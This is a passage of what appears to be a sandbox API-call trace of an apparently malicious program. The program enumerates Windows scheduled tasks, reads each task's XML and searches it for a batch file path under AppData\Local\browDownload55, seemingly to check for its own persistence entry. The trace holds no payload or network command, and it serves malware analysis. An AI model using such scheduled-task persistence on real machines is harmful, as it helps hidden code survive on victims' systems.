\r\n \r\n \r\n false\r\n false\r\n PT6H\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n false\r\n PT2M\r\n \r\n \r\n 7508BCA33E1E8702\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\SpaceAgent.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.871] IUnknown:Release (This=0x929710) returned 0x0 [0163.871] IRegisteredTaskCollection:get_Item (in: This=0x929590, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929710) returned 0x0 [0163.871] IRegisteredTask:get_Name (in: This=0x929710, pName=0xce058 | out: pName=0xce058*="SpaceManagerTask") returned 0x0 [0163.871] IRegisteredTask:get_Xml (in: This=0x929710, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\SpaceMan.exe,-1)\r\n $(@%SystemRoot%\\system32\\SpaceMan.exe,-2)\r\n $(@%SystemRoot%\\system32\\SpaceMan.exe,-3)\r\n \\Microsoft\\Windows\\SpacePort\\SpaceManagerTask\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n PT6H\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n false\r\n PT2M\r\n \r\n \r\n 7510BCA33E1E8702\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\SpaceMan.exe\r\n /Repair\r\n \r\n \r\n") returned 0x0 [0163.872] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\SpaceMan.exe,-1)\r\n $(@%SystemRoot%\\system32\\SpaceMan.exe,-2)\r\n $(@%SystemRoot%\\system32\\SpaceMan.exe,-3)\r\n \\Microsoft\\Windows\\SpacePort\\SpaceManagerTask\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n PT6H\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n false\r\n PT2M\r\n \r\n \r\n 7510BCA33E1E8702\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\SpaceMan.exe\r\n /Repair\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.872] IUnknown:Release (This=0x929710) returned 0x0 [0163.872] IUnknown:Release (This=0x929590) returned 0x0 [0163.872] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929590) returned 0x0 [0163.873] ITaskFolderCollection:get_Count (in: This=0x929590, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.873] IUnknown:Release (This=0x929590) returned 0x0 [0163.873] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.873] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x39, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.873] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x9295a0) returned 0x0 [0163.874] IRegisteredTaskCollection:get_Count (in: This=0x9295a0, pCount=0xce048 | out: pCount=0xce048*=2) returned 0x0 [0163.874] IRegisteredTaskCollection:get_Item (in: This=0x9295a0, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929740) returned 0x0 [0163.874] IRegisteredTask:get_Name (in: This=0x929740, pName=0xce058 | out: pName=0xce058*="Storage Tiers Management Initialization") returned 0x0 [0163.874] IRegisteredTask:get_Xml (in: This=0x929740, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:AI(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)(A;;FR;;;AU)\r\n $(@%systemroot%\\system32\\TieringEngineService.exe,-601)\r\n $(@%systemroot%\\system32\\TieringEngineService.exe,-600)\r\n $(@%systemroot%\\system32\\TieringEngineService.exe,-602)\r\n \\Microsoft\\Windows\\Storage Tiers Management\\Storage Tiers Management Initialization\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n true\r\n PT0S\r\n IgnoreNew\r\n true\r\n \r\n false\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7508BCA32B1D940D\r\n \r\n \r\n \r\n \r\n {5C9AB547-345D-4175-9AF6-65133463A100}\r\n \r\n \r\n") returned 0x0 [0163.875] StrStrIW (lpFirst="\r\n\r\n \r\n D:AI(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)(A;;FR;;;AU)\r\n $(@%systemroot%\\system32\\TieringEngineService.exe,-601)\r\n $(@%systemroot%\\system32\\TieringEngineService.exe,-600)\r\n $(@%systemroot%\\system32\\TieringEngineService.exe,-602)\r\n \\Microsoft\\Windows\\Storage Tiers Management\\Storage Tiers Management Initialization\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n true\r\n PT0S\r\n IgnoreNew\r\n true\r\n \r\n false\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7508BCA32B1D940D\r\n \r\n \r\n \r\n \r\n {5C9AB547-345D-4175-9AF6-65133463A100}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.875] IUnknown:Release (This=0x929740) returned 0x0 [0163.875] IRegisteredTaskCollection:get_Item (in: This=0x9295a0, index=0xce098*(varType=0x3, wReserved1=0x7f, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929740) returned 0x0 [0163.875] IRegisteredTask:get_Name (in: This=0x929740, pName=0xce058 | out: pName=0xce058*="Storage Tiers Optimization") returned 0x0 [0163.875] IRegisteredTask:get_Xml (in: This=0x929740, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:AI(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)(A;;FR;;;AU)\r\n $(@%systemroot%\\system32\\TieringEngineService.exe,-601)\r\n $(@%systemroot%\\system32\\TieringEngineService.exe,-600)\r\n $(@%systemroot%\\system32\\TieringEngineService.exe,-603)\r\n \\Microsoft\\Windows\\Storage Tiers Management\\Storage Tiers Optimization\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2013-01-01T01:00:00\r\n \r\n PT4H\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\defrag.exe\r\n -c -h -g -# -m 8 -i 13500\r\n \r\n \r\n") returned 0x0 [0163.876] StrStrIW (lpFirst="\r\n\r\n \r\n D:AI(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)(A;;FR;;;AU)\r\n $(@%systemroot%\\system32\\TieringEngineService.exe,-601)\r\n $(@%systemroot%\\system32\\TieringEngineService.exe,-600)\r\n $(@%systemroot%\\system32\\TieringEngineService.exe,-603)\r\n \\Microsoft\\Windows\\Storage Tiers Management\\Storage Tiers Optimization\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2013-01-01T01:00:00\r\n \r\n PT4H\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\defrag.exe\r\n -c -h -g -# -m 8 -i 13500\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.876] IUnknown:Release (This=0x929740) returned 0x0 [0163.876] IUnknown:Release (This=0x9295a0) returned 0x0 [0163.876] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x9295a0) returned 0x0 [0163.877] ITaskFolderCollection:get_Count (in: This=0x9295a0, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.877] IUnknown:Release (This=0x9295a0) returned 0x0 [0163.877] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.877] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3a, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.877] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929590) returned 0x0 [0163.878] IRegisteredTaskCollection:get_Count (in: This=0x929590, pCount=0xce048 | out: pCount=0xce048*=0) returned 0x0 [0163.878] IUnknown:Release (This=0x929590) returned 0x0 [0163.878] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929590) returned 0x0 [0163.879] ITaskFolderCollection:get_Count (in: This=0x929590, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.879] IUnknown:Release (This=0x929590) returned 0x0 [0163.879] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.879] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3b, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.879] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929580) returned 0x0 [0163.880] IRegisteredTaskCollection:get_Count (in: This=0x929580, pCount=0xce048 | out: pCount=0xce048*=4) returned 0x0 [0163.880] IRegisteredTaskCollection:get_Item (in: This=0x929580, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929700) returned 0x0 [0163.880] IRegisteredTask:get_Name (in: This=0x929700, pName=0xce058 | out: pName=0xce058*="HybridDriveCachePrepopulate") returned 0x0 [0163.880] IRegisteredTask:get_Xml (in: This=0x929700, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)\r\n $(@%systemRoot%\\System32\\sysmain.dll,-3000)\r\n $(@%systemRoot%\\System32\\sysmain.dll,-3003)\r\n \\Microsoft\\Windows\\Sysmain\\HybridDriveCachePrepopulate\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n false\r\n PT2H\r\n IgnoreNew\r\n 6\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P14D\r\n \r\n \r\n \r\n \r\n \r\n {17C82257-654E-4C47-8E23-DCA24EAA76A0}\r\n \r\n \r\n") returned 0x0 [0163.881] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)\r\n $(@%systemRoot%\\System32\\sysmain.dll,-3000)\r\n $(@%systemRoot%\\System32\\sysmain.dll,-3003)\r\n \\Microsoft\\Windows\\Sysmain\\HybridDriveCachePrepopulate\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n false\r\n PT2H\r\n IgnoreNew\r\n 6\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P14D\r\n \r\n \r\n \r\n \r\n \r\n {17C82257-654E-4C47-8E23-DCA24EAA76A0}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.881] IUnknown:Release (This=0x929700) returned 0x0 [0163.881] IRegisteredTaskCollection:get_Item (in: This=0x929580, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929700) returned 0x0 [0163.881] IRegisteredTask:get_Name (in: This=0x929700, pName=0xce058 | out: pName=0xce058*="HybridDriveCacheRebalance") returned 0x0 [0163.881] IRegisteredTask:get_Xml (in: This=0x929700, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)\r\n $(@%systemRoot%\\System32\\sysmain.dll,-3000)\r\n $(@%systemRoot%\\System32\\sysmain.dll,-3002)\r\n \\Microsoft\\Windows\\Sysmain\\HybridDriveCacheRebalance\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n PT10M\r\n IgnoreNew\r\n 6\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P7D\r\n true\r\n \r\n \r\n \r\n \r\n \r\n {D44377B8-1F2F-4FAA-9C8E-6C4AD2928E47}\r\n \r\n \r\n") returned 0x0 [0163.883] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)\r\n $(@%systemRoot%\\System32\\sysmain.dll,-3000)\r\n $(@%systemRoot%\\System32\\sysmain.dll,-3002)\r\n \\Microsoft\\Windows\\Sysmain\\HybridDriveCacheRebalance\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n PT10M\r\n IgnoreNew\r\n 6\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P7D\r\n true\r\n \r\n \r\n \r\n \r\n \r\n {D44377B8-1F2F-4FAA-9C8E-6C4AD2928E47}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.883] IUnknown:Release (This=0x929700) returned 0x0 [0163.883] IRegisteredTaskCollection:get_Item (in: This=0x929580, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929700) returned 0x0 [0163.883] IRegisteredTask:get_Name (in: This=0x929700, pName=0xce058 | out: pName=0xce058*="ResPriStaticDbSync") returned 0x0 [0163.883] IRegisteredTask:get_Xml (in: This=0x929700, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)\r\n $(@%systemRoot%\\System32\\sysmain.dll,-3000)\r\n $(@%systemRoot%\\System32\\sysmain.dll,-3004)\r\n \\Microsoft\\Windows\\Sysmain\\ResPriStaticDbSync\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT10M\r\n IgnoreNew\r\n 6\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P7D\r\n P14D\r\n true\r\n \r\n \r\n \r\n \r\n \r\n {297EE78C-BA95-4E94-81D3-D6E7F089C7B5}\r\n \r\n \r\n") returned 0x0 [0163.884] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)\r\n $(@%systemRoot%\\System32\\sysmain.dll,-3000)\r\n $(@%systemRoot%\\System32\\sysmain.dll,-3004)\r\n \\Microsoft\\Windows\\Sysmain\\ResPriStaticDbSync\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT10M\r\n IgnoreNew\r\n 6\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P7D\r\n P14D\r\n true\r\n \r\n \r\n \r\n \r\n \r\n {297EE78C-BA95-4E94-81D3-D6E7F089C7B5}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.884] IUnknown:Release (This=0x929700) returned 0x0 [0163.884] IRegisteredTaskCollection:get_Item (in: This=0x929580, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929700) returned 0x0 [0163.884] IRegisteredTask:get_Name (in: This=0x929700, pName=0xce058 | out: pName=0xce058*="WsSwapAssessmentTask") returned 0x0 [0163.884] IRegisteredTask:get_Xml (in: This=0x929700, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)\r\n $(@%systemRoot%\\System32\\sysmain.dll,-3000)\r\n $(@%systemRoot%\\System32\\sysmain.dll,-3001)\r\n \\Microsoft\\Windows\\Sysmain\\WsSwapAssessmentTask\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n false\r\n IgnoreNew\r\n 6\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P30D\r\n P31D\r\n true\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n sysmain.dll,PfSvWsSwapAssessmentTask\r\n \r\n \r\n") returned 0x0 [0163.884] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)\r\n $(@%systemRoot%\\System32\\sysmain.dll,-3000)\r\n $(@%systemRoot%\\System32\\sysmain.dll,-3001)\r\n \\Microsoft\\Windows\\Sysmain\\WsSwapAssessmentTask\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n false\r\n IgnoreNew\r\n 6\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P30D\r\n P31D\r\n true\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n sysmain.dll,PfSvWsSwapAssessmentTask\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.885] IUnknown:Release (This=0x929700) returned 0x0 [0163.885] IUnknown:Release (This=0x929580) returned 0x0 [0163.885] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929580) returned 0x0 [0163.885] ITaskFolderCollection:get_Count (in: This=0x929580, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.885] IUnknown:Release (This=0x929580) returned 0x0 [0163.886] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.886] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3c, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.886] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929590) returned 0x0 [0163.886] IRegisteredTaskCollection:get_Count (in: This=0x929590, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0163.886] IRegisteredTaskCollection:get_Item (in: This=0x929590, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929720) returned 0x0 [0163.886] IRegisteredTask:get_Name (in: This=0x929720, pName=0xce058 | out: pName=0xce058*="SR") returned 0x0 [0163.886] IRegisteredTask:get_Xml (in: This=0x929720, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;FRFX;;;LS)\r\n $(@%systemroot%\\system32\\srrstr.dll,-320)\r\n $(@%systemroot%\\system32\\srrstr.dll,-321)\r\n $(@%systemroot%\\system32\\srrstr.dll,-322)\r\n \\Microsoft\\Windows\\SystemRestore\\SR\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n false\r\n IgnoreNew\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P3D\r\n P3DT1M\r\n true\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\srtasks.exe\r\n ExecuteScheduledSPPCreation\r\n \r\n \r\n") returned 0x0 [0163.887] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;FRFX;;;LS)\r\n $(@%systemroot%\\system32\\srrstr.dll,-320)\r\n $(@%systemroot%\\system32\\srrstr.dll,-321)\r\n $(@%systemroot%\\system32\\srrstr.dll,-322)\r\n \\Microsoft\\Windows\\SystemRestore\\SR\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n false\r\n IgnoreNew\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P3D\r\n P3DT1M\r\n true\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\srtasks.exe\r\n ExecuteScheduledSPPCreation\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.887] IUnknown:Release (This=0x929720) returned 0x0 [0163.887] IUnknown:Release (This=0x929590) returned 0x0 [0163.887] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929590) returned 0x0 [0163.888] ITaskFolderCollection:get_Count (in: This=0x929590, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.888] IUnknown:Release (This=0x929590) returned 0x0 [0163.888] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.888] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3d, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.888] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929590) returned 0x0 [0163.889] IRegisteredTaskCollection:get_Count (in: This=0x929590, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0163.889] IRegisteredTaskCollection:get_Item (in: This=0x929590, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929710) returned 0x0 [0163.889] IRegisteredTask:get_Name (in: This=0x929710, pName=0xce058 | out: pName=0xce058*="Interactive") returned 0x0 [0163.889] IRegisteredTask:get_Xml (in: This=0x929710, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)\r\n $(@%systemroot%\\system32\\wdc.dll,-10042)\r\n $(@%systemroot%\\system32\\wdc.dll,-10041)\r\n $(@%systemroot%\\system32\\wdc.dll,-10043)\r\n \\Microsoft\\Windows\\Task Manager\\Interactive\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n false\r\n false\r\n PT0S\r\n true\r\n Parallel\r\n 5\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n {855FEC53-D2E4-4999-9E87-3414E9CF0FF4}\r\n \r\n \r\n \r\n") returned 0x0 [0163.889] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)\r\n $(@%systemroot%\\system32\\wdc.dll,-10042)\r\n $(@%systemroot%\\system32\\wdc.dll,-10041)\r\n $(@%systemroot%\\system32\\wdc.dll,-10043)\r\n \\Microsoft\\Windows\\Task Manager\\Interactive\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n false\r\n false\r\n PT0S\r\n true\r\n Parallel\r\n 5\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n {855FEC53-D2E4-4999-9E87-3414E9CF0FF4}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.890] IUnknown:Release (This=0x929710) returned 0x0 [0163.890] IUnknown:Release (This=0x929590) returned 0x0 [0163.890] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929590) returned 0x0 [0163.891] ITaskFolderCollection:get_Count (in: This=0x929590, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.891] IUnknown:Release (This=0x929590) returned 0x0 [0163.891] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.891] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3e, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.891] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929590) returned 0x0 [0163.892] IRegisteredTaskCollection:get_Count (in: This=0x929590, pCount=0xce048 | out: pCount=0xce048*=0) returned 0x0 [0163.892] IUnknown:Release (This=0x929590) returned 0x0 [0163.892] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929590) returned 0x0 [0163.892] ITaskFolderCollection:get_Count (in: This=0x929590, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.892] IUnknown:Release (This=0x929590) returned 0x0 [0163.892] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.892] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3f, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.893] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x9295a0) returned 0x0 [0163.893] IRegisteredTaskCollection:get_Count (in: This=0x9295a0, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0163.893] IRegisteredTaskCollection:get_Item (in: This=0x9295a0, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929740) returned 0x0 [0163.893] IRegisteredTask:get_Name (in: This=0x929740, pName=0xce058 | out: pName=0xce058*="MsCtfMonitor") returned 0x0 [0163.894] IRegisteredTask:get_Xml (in: This=0x929740, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n $(@%systemRoot%\\system32\\MsCtfMonitor.dll,-1000)\r\n $(@%systemRoot%\\system32\\MsCtfMonitor.dll,-1001)\r\n \\Microsoft\\Windows\\TextServicesFramework\\MsCtfMonitor\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n false\r\n false\r\n PT0S\r\n true\r\n Parallel\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n {01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}\r\n \r\n \r\n") returned 0x0 [0163.895] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n $(@%systemRoot%\\system32\\MsCtfMonitor.dll,-1000)\r\n $(@%systemRoot%\\system32\\MsCtfMonitor.dll,-1001)\r\n \\Microsoft\\Windows\\TextServicesFramework\\MsCtfMonitor\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n false\r\n false\r\n PT0S\r\n true\r\n Parallel\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n {01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.895] IUnknown:Release (This=0x929740) returned 0x0 [0163.895] IUnknown:Release (This=0x9295a0) returned 0x0 [0163.895] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: 